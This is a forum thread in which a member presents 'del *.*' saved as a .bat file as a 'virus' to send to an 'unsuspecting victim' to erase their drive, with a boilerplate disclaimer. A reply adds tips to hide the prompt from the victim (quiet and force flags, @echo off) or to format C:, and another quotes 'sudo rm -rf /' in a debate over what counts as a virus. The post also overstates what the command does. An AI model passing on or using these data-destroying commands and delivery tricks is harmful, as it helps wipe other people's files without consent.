6 Character Batch Virus - Simple but VERY Powerful

CircuitX's Avatar
Go4Expert Member
This is a very short tutorial describing how to make a very simple batch virus which consists of only 6 characters.

This virus will delete every file with any file extension.

Here's the code:
Quote:
del *.*
3 Easy Steps to Turn It Into a Virus
1)Type that into notepad.
2)Save the file as a ".bat".
3)Send it.

As the unsuspecting victim opens the file, his whole hard-drive will be erased.

PLEASE DO NOT ACTUALLY DO THIS. THIS IS FOR EDUCATION ONLY.

DISCLAIMER: I will not be held responsible for the actions of people who read this tutorial. This tutorial is for educational purposes ONLY. And does not in anyway encourage illegal activity.
0
shabbir's Avatar, Join Date: Jul 2004
Go4Expert Founder
I would say 7 characters. space is a character
0
CircuitX's Avatar
Go4Expert Member
Quote:
Originally Posted by shabbir View Post
I would say 7 characters. space is a character
Fair enough .

But I prefer to think of it as six.
0
fourthdimension's Avatar, Join Date: Jan 2009
Ambitious contributor
Quote:
Originally Posted by CircuitX View Post
This is a very short tutorial describing how to make a very simple batch virus which consists of only 6 characters.

This virus will delete every file with any file extension.

Here's the code:


3 Easy Steps to Turn It Into a Virus
1)Type that into notepad.
2)Save the file as a ".bat".
3)Send it.

As the unsuspecting victim opens the file, his whole hard-drive will be erased.

PLEASE DO NOT ACTUALLY DO THIS. THIS IS FOR EDUCATION ONLY.

DISCLAIMER: I will not be held responsible for the actions of people who read this tutorial. This tutorial is for educational purposes ONLY. And does not in anyway encourage illegal activity.
Nice. Although depending on how he runs it, it might only clean out the current directory. Also adding force and quiet flags as well as @echo off might make him a bit less suspicious... most users wouldn't answer affirmative to a prompt like "C:\Users\<their user>\*.*, Are you sure (Y/N)?". Of course, for a few extra characters, you can just format c.
Good post, though. It demonstrates just how easy it is to write a virus for windows.

As a side note... it's funny how a disclaimer can take up more space than its code. lol

Last edited by fourthdimension; 4Feb2009 at 12:15..
0
shabbir's Avatar, Join Date: Jul 2004
Go4Expert Founder
Quote:
Originally Posted by fourthdimension View Post
As a side note... it's funny how a disclaimer can take up more space than its code. lol
0
xpi0t0s's Avatar, Join Date: Aug 2004
Mentor
Not a virus, because one of the features of a virus is that it self replicates. This is just a delete command, and it doesn't show "how easy it is to write a virus for Windows" - if that's the case, then "rm *" is a 3 character "virus" for Linux, or "sudo rm -rf /" for a more powerful 10 character variant.

http://en.wikipedia.org/wiki/Computer_virus
0
fourthdimension's Avatar, Join Date: Jan 2009
Ambitious contributor
That depends on how you define a virus. Worms have to self-replicate, but many people do not consider that functionality necessary for viruses (including the authors of many security-focused books). All a virus really is is a process that runs without the user's approval or knowledge. Besides, code like this would have no problems replicating if you bind it to another executable and start seeding it. So maybe this would be considered more of a trojan than a virus (while it could be considered both), but it doesn't make too much difference in this case.
Also, there's a big difference between those commands. Sure, they're just delete commands; in reality, what are viruses and malware in general? Just a collection of "just <whatever>" commands that are intended to be run unknowingly written by authors with malicious intent. The windows command can be bound to anything, so something simple like just opening a picture could erase your hard drive. On linux, a command like that cannot operate unless you first chmod it and then enter your administrator password. If it's run in a terminal, they'd be able to see the command and either not enter the password or ctrl-c it, and if not, you'd want to use gksudo, not sudo... which would also raise red flags since the average linux user tends to be more aware of how his OS works than the average windows user, and he'd know that if he hadn't entered any commands needing super user privilege there's no reason the system would need his password. There's no point in trying to classify something as a virus if it has no chance of ever being run.